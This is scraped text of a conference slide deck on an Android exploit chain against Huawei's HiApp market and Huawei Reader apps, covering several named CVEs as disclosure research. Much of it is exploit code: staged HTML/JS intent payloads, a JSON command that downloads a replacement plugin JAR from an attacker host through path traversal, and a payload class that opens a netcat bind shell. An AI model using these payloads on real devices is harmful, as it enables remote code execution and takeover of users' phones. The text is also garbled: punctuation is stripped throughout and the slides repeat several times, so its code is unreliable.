android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 19: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 20: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 21: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

